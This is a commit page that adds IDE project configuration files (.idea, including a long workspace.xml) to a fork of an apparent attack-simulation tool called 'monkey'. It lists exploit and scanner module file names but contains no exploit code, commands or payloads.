p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

code organization

This commit is contained in:
urihershgc 2015-11-30 10:56:20 +02:00
parent b370582666
commit 048c989b27
38 changed files with 1240 additions and 248 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.idea/.name Normal file
View File

@ -0,0 +1 @@
monkey

6
.idea/encodings.xml Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Encoding">
<file url="PROJECT" charset="UTF-8" />
</component>
</project>

14
.idea/misc.xml Normal file
View File

@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="Add" />
<OptionsSetting value="true" id="Remove" />
<OptionsSetting value="true" id="Checkout" />
<OptionsSetting value="true" id="Update" />
<OptionsSetting value="true" id="Status" />
<OptionsSetting value="true" id="Edit" />
<ConfirmationsSetting value="0" id="Add" />
<ConfirmationsSetting value="0" id="Remove" />
</component>
<component name="ProjectRootManager" version="2" project-jdk-name="Python 2.7 (C:\Python27\python.exe)" project-jdk-type="Python SDK" />
</project>

8
.idea/modules.xml Normal file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/.idea/monkey.iml" filepath="$PROJECT_DIR$/.idea/monkey.iml" />
</modules>
</component>
</project>

12
.idea/monkey.iml Normal file
View File

@ -0,0 +1,12 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$" />
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="TestRunnerService">
<option name="projectConfiguration" value="py.test" />
<option name="PROJECT_TEST_RUNNER" value="py.test" />
</component>
</module>

6
.idea/vcs.xml Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="VcsDirectoryMappings">
<mapping directory="$PROJECT_DIR$" vcs="Git" />
</component>
</project>

954
.idea/workspace.xml Normal file
View File

@ -0,0 +1,954 @@
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ChangeListManager">
<list default="true" id="b6a17012-d37a-4cdd-b5ce-aba83b1d5fc7" name="Default" comment="">
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/config.py" afterPath="$PROJECT_DIR$/chaos_monkey/config.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/control.py" afterPath="$PROJECT_DIR$/chaos_monkey/control.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/dropper.py" afterPath="$PROJECT_DIR$/chaos_monkey/dropper.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/__init__.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/rdpgrinder.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/rdpgrinder.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/smbexec.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/smbexec.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/sshexec.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/sshexec.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/tools.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/tools.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/win_ms08_067.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/win_ms08_067.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/exploit/wmiexec.py" afterPath="$PROJECT_DIR$/chaos_monkey/exploit/wmiexec.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/model/__init__.py" afterPath="$PROJECT_DIR$/chaos_monkey/model/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/model/host.py" afterPath="$PROJECT_DIR$/chaos_monkey/model/host.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/monkey.py" afterPath="$PROJECT_DIR$/chaos_monkey/monkey.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/monkeyfs.py" afterPath="$PROJECT_DIR$/chaos_monkey/monkeyfs.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/__init__.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/firewall.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/firewall.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/info.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/info.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/network_scanner.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/network_scanner.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/ping_scanner.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/ping_scanner.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/range.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/range.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/smbfinger.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/smbfinger.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/sshfinger.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/sshfinger.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/tcp_scanner.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/tcp_scanner.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/network/tools.py" afterPath="$PROJECT_DIR$/chaos_monkey/network/tools.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/system_singleton.py" afterPath="$PROJECT_DIR$/chaos_monkey/system_singleton.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/transport/__init__.py" afterPath="$PROJECT_DIR$/chaos_monkey/transport/__init__.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/transport/base.py" afterPath="$PROJECT_DIR$/chaos_monkey/transport/base.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/transport/ftp.py" afterPath="$PROJECT_DIR$/chaos_monkey/transport/ftp.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/transport/http.py" afterPath="$PROJECT_DIR$/chaos_monkey/transport/http.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/transport/tcp.py" afterPath="$PROJECT_DIR$/chaos_monkey/transport/tcp.py" />
<change type="MODIFICATION" beforePath="$PROJECT_DIR$/chaos_monkey/tunnel.py" afterPath="$PROJECT_DIR$/chaos_monkey/tunnel.py" />
</list>
<ignored path="monkey.iws" />
<ignored path=".idea/workspace.xml" />
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
<option name="TRACKING_ENABLED" value="true" />
<option name="SHOW_DIALOG" value="false" />
<option name="HIGHLIGHT_CONFLICTS" value="true" />
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
<option name="LAST_RESOLUTION" value="IGNORE" />
</component>
<component name="ChangesViewManager" flattened_view="true" show_ignored="false" />
<component name="CreatePatchCommitExecutor">
<option name="PATCH_PATH" value="" />
</component>
<component name="ExecutionTargetManager" SELECTED_TARGET="default_target" />
<component name="FavoritesManager">
<favorites_list name="monkey" />
</component>
<component name="FileEditorManager">
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
<file leaf-file-name="sshexec.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/sshexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="126" column="21" selection-start-line="126" selection-start-column="21" selection-end-line="126" selection-end-column="21" />
<folding>
<element signature="e#0#15#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="tools.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/tools.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="26" column="0" selection-start-line="26" selection-start-column="0" selection-end-line="26" selection-end-column="0" />
<folding>
<element signature="e#0#9#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="__init__.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
</file>
<file leaf-file-name="win_ms08_067.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/win_ms08_067.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="264" column="16" selection-start-line="264" selection-start-column="16" selection-end-line="264" selection-end-column="16" />
<folding>
<element signature="e#330#340#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="wmiexec.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/wmiexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="109" column="0" selection-start-line="109" selection-start-column="0" selection-end-line="109" selection-end-column="0" />
<folding>
<element signature="e#0#13#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="build_windows.bat" pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/chaos_monkey/build_windows.bat">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.05230769">
<caret line="2" column="0" selection-start-line="2" selection-start-column="0" selection-end-line="2" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
</file>
<file leaf-file-name="__init__.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/model/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="14" column="0" selection-start-line="14" selection-start-column="0" selection-end-line="14" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
</file>
<file leaf-file-name="__init__.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="6" column="0" selection-start-line="6" selection-start-column="0" selection-end-line="6" selection-end-column="0" />
<folding>
<element signature="e#0#39#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="rdpgrinder.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/rdpgrinder.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="94" column="36" selection-start-line="94" selection-start-column="36" selection-end-line="94" selection-end-column="36" />
<folding>
<element signature="e#0#11#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
<file leaf-file-name="smbexec.py" pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/chaos_monkey/exploit/smbexec.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding>
<element signature="e#0#10#0" expanded="true" />
</folding>
</state>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="Git.Settings">
<option name="RECENT_GIT_ROOT_PATH" value="$PROJECT_DIR$" />
</component>
<component name="IdeDocumentHistory">
<option name="CHANGED_PATHS">
<list>
<option value="$PROJECT_DIR$/monkey_island/cc/main.py" />
<option value="$PROJECT_DIR$/chaos_monkey/main.py" />
<option value="$PROJECT_DIR$/chaos_monkey/monkey.py" />
<option value="$PROJECT_DIR$/chaos_monkey/monkeyfs.py" />
<option value="$PROJECT_DIR$/chaos_monkey/system_singleton.py" />
<option value="$PROJECT_DIR$/chaos_monkey/tunnel.py" />
<option value="$PROJECT_DIR$/chaos_monkey/dropper.py" />
<option value="$PROJECT_DIR$/chaos_monkey/control.py" />
<option value="$PROJECT_DIR$/chaos_monkey/config.py" />
<option value="$PROJECT_DIR$/chaos_monkey/transport/__init__.py" />
<option value="$PROJECT_DIR$/chaos_monkey/transport/base.py" />
<option value="$PROJECT_DIR$/chaos_monkey/transport/ftp.py" />
<option value="$PROJECT_DIR$/chaos_monkey/transport/http.py" />
<option value="$PROJECT_DIR$/chaos_monkey/transport/tcp.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/__init__.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/firewall.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/info.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/network_scanner.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/ping_scanner.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/range.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/smbfinger.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/sshfinger.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/tcp_scanner.py" />
<option value="$PROJECT_DIR$/chaos_monkey/network/tools.py" />
<option value="$PROJECT_DIR$/chaos_monkey/model/host.py" />
<option value="$PROJECT_DIR$/chaos_monkey/model/__init__.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/__init__.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/rdpgrinder.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/smbexec.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/sshexec.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/tools.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/win_ms08_067.py" />
<option value="$PROJECT_DIR$/chaos_monkey/exploit/wmiexec.py" />
</list>
</option>
</component>
<component name="ProjectFrameBounds">
<option name="x" value="-10" />
<option name="width" value="1934" />
<option name="height" value="1030" />
</component>
<component name="ProjectLevelVcsManager" settingsEditedManually="false">
<OptionsSetting value="true" id="Add" />
<OptionsSetting value="true" id="Remove" />
<OptionsSetting value="true" id="Checkout" />
<OptionsSetting value="true" id="Update" />
<OptionsSetting value="true" id="Status" />
<OptionsSetting value="true" id="Edit" />
<ConfirmationsSetting value="0" id="Add" />
<ConfirmationsSetting value="0" id="Remove" />
</component>
<component name="ProjectView">
<navigator currentView="ProjectPane" proportions="" version="1">
<flattenPackages />
<showMembers />
<showModules />
<showLibraryContents />
<hideEmptyPackages />
<abbreviatePackageNames />
<autoscrollToSource />
<autoscrollFromSource />
<sortByType />
<manualOrder />
<foldersAlwaysOnTop value="true" />
</navigator>
<panes>
<pane id="Scratches" />
<pane id="ProjectPane">
<subPane>
<PATH>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />
</PATH_ELEMENT>
</PATH>
<PATH>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
</PATH>
<PATH>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="chaos_monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
</PATH>
<PATH>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="chaos_monkey" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
<PATH_ELEMENT>
<option name="myItemId" value="model" />
<option name="myItemType" value="com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode" />
</PATH_ELEMENT>
</PATH>
</subPane>
</pane>
<pane id="Scope" />
</panes>
</component>
<component name="PropertiesComponent">
<property name="last_opened_file_path" value="$PROJECT_DIR$" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatWidth0" value="421" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatOrder0" value="0" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatWidth1" value="457" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatOrder1" value="1" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatWidth2" value="457" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatOrder2" value="2" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatWidth3" value="1470" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_flatOrder3" value="3" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeWidth0" value="421" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeOrder0" value="0" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeWidth1" value="457" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeOrder1" value="1" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeWidth2" value="457" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeOrder2" value="2" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeWidth3" value="1470" />
<property name="FileHistory.git4idea.history.GitHistoryProvider_treeOrder3" value="3" />
</component>
<component name="RunManager">
<configuration default="true" type="PythonConfigurationType" factoryName="Python">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs>
<env name="PYTHONUNBUFFERED" value="1" />
</envs>
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="PARAMETERS" value="" />
<option name="SHOW_COMMAND_LINE" value="false" />
<method />
</configuration>
<configuration default="true" type="tests" factoryName="Attests">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs />
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="CLASS_NAME" value="" />
<option name="METHOD_NAME" value="" />
<option name="FOLDER_NAME" value="" />
<option name="TEST_TYPE" value="TEST_SCRIPT" />
<option name="PATTERN" value="" />
<option name="USE_PATTERN" value="false" />
<method />
</configuration>
<configuration default="true" type="tests" factoryName="Doctests">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs />
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="CLASS_NAME" value="" />
<option name="METHOD_NAME" value="" />
<option name="FOLDER_NAME" value="" />
<option name="TEST_TYPE" value="TEST_SCRIPT" />
<option name="PATTERN" value="" />
<option name="USE_PATTERN" value="false" />
<method />
</configuration>
<configuration default="true" type="tests" factoryName="Nosetests">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs />
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="CLASS_NAME" value="" />
<option name="METHOD_NAME" value="" />
<option name="FOLDER_NAME" value="" />
<option name="TEST_TYPE" value="TEST_SCRIPT" />
<option name="PATTERN" value="" />
<option name="USE_PATTERN" value="false" />
<option name="PARAMS" value="" />
<option name="USE_PARAM" value="false" />
<method />
</configuration>
<configuration default="true" type="tests" factoryName="Unittests">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs />
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="CLASS_NAME" value="" />
<option name="METHOD_NAME" value="" />
<option name="FOLDER_NAME" value="" />
<option name="TEST_TYPE" value="TEST_SCRIPT" />
<option name="PATTERN" value="" />
<option name="USE_PATTERN" value="false" />
<option name="PUREUNITTEST" value="true" />
<option name="PARAMS" value="" />
<option name="USE_PARAM" value="false" />
<method />
</configuration>
<configuration default="true" type="tests" factoryName="py.test">
<option name="INTERPRETER_OPTIONS" value="" />
<option name="PARENT_ENVS" value="true" />
<envs />
<option name="SDK_HOME" value="" />
<option name="WORKING_DIRECTORY" value="" />
<option name="IS_MODULE_SDK" value="false" />
<option name="ADD_CONTENT_ROOTS" value="true" />
<option name="ADD_SOURCE_ROOTS" value="true" />
<module name="monkey" />
<option name="SCRIPT_NAME" value="" />
<option name="CLASS_NAME" value="" />
<option name="METHOD_NAME" value="" />
<option name="FOLDER_NAME" value="" />
<option name="TEST_TYPE" value="TEST_SCRIPT" />
<option name="PATTERN" value="" />
<option name="USE_PATTERN" value="false" />
<option name="testToRun" value="" />
<option name="keywords" value="" />
<option name="params" value="" />
<option name="USE_PARAM" value="false" />
<option name="USE_KEYWORD" value="false" />
<method />
</configuration>
</component>
<component name="ShelveChangesManager" show_recycled="false" />
<component name="SvnConfiguration">
<configuration />
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="b6a17012-d37a-4cdd-b5ce-aba83b1d5fc7" name="Default" comment="" />
<created>1448456974376</created>
<option name="number" value="Default" />
<updated>1448456974376</updated>
</task>
<servers />
</component>
<component name="ToolWindowManager">
<frame x="-10" y="0" width="1934" height="1030" extended-state="0" />
<editor active="true" />
<layout>
<window_info id="Project" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="true" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="TODO" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="6" side_tool="false" content_ui="tabs" />
<window_info id="Event Log" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="true" content_ui="tabs" />
<window_info id="Find" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="true" show_stripe_button="true" weight="0.24414715" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Python Console" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Version Control" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.209202" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Structure" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Terminal" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="7" side_tool="false" content_ui="tabs" />
<window_info id="Favorites" active="false" anchor="left" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="true" content_ui="tabs" />
<window_info id="Cvs" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="4" side_tool="false" content_ui="tabs" />
<window_info id="Message" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Commander" active="false" anchor="right" auto_hide="false" internal_type="SLIDING" type="SLIDING" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="0" side_tool="false" content_ui="tabs" />
<window_info id="Inspection" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="5" side_tool="false" content_ui="tabs" />
<window_info id="Run" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.33" sideWeight="0.5" order="2" side_tool="false" content_ui="tabs" />
<window_info id="Hierarchy" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="2" side_tool="false" content_ui="combo" />
<window_info id="Ant Build" active="false" anchor="right" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.25" sideWeight="0.5" order="1" side_tool="false" content_ui="tabs" />
<window_info id="Debug" active="false" anchor="bottom" auto_hide="false" internal_type="DOCKED" type="DOCKED" visible="false" show_stripe_button="true" weight="0.4" sideWeight="0.5" order="3" side_tool="false" content_ui="tabs" />
</layout>
</component>
<component name="Vcs.Log.UiProperties">
<option name="RECENTLY_FILTERED_USER_GROUPS">
<collection />
</option>
<option name="RECENTLY_FILTERED_BRANCH_GROUPS">
<collection />
</option>
</component>
<component name="VcsContentAnnotationSettings">
<option name="myLimit" value="2678400000" />
</component>
<component name="XDebuggerManager">
<breakpoint-manager>
<option name="time" value="5" />
</breakpoint-manager>
<watches-manager />
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/ping_scanner.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="20" column="8" selection-start-line="20" selection-start-column="8" selection-end-line="20" selection-end-column="8" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/network/__init__.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/control.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="104" column="8" selection-start-line="104" selection-start-column="8" selection-end-line="104" selection-end-column="8" />
<folding />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/build_env/readme.txt">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="59" column="30" selection-start-line="59" selection-start-column="30" selection-end-line="59" selection-end-column="30" />
</state>
</provider>
</entry>
<entry file="file://C:/Python27/Lib/argparse.py">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.3325893">
<caret line="1706" column="8" selection-start-line="1706" selection-start-column="8" selection-end-line="1706" selection-end-column="8" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/monkey_island/cc/admin/ui/css/font-awesome.min.css">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.34813085">
<caret line="3" column="9830" selection-start-line="3" selection-start-column="9830" selection-end-line="3" selection-end-column="9830" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/chaos_monkey/monkey.spec">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
<caret line="0" column="0" selection-start-line="0" selection-start-column="0" selection-end-line="0" selection-end-column="0" />
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/monkey_island/readme.txt">
<provider selected="true" editor-type-id="text-editor">
<state vertical-scroll-proportion="0.0">
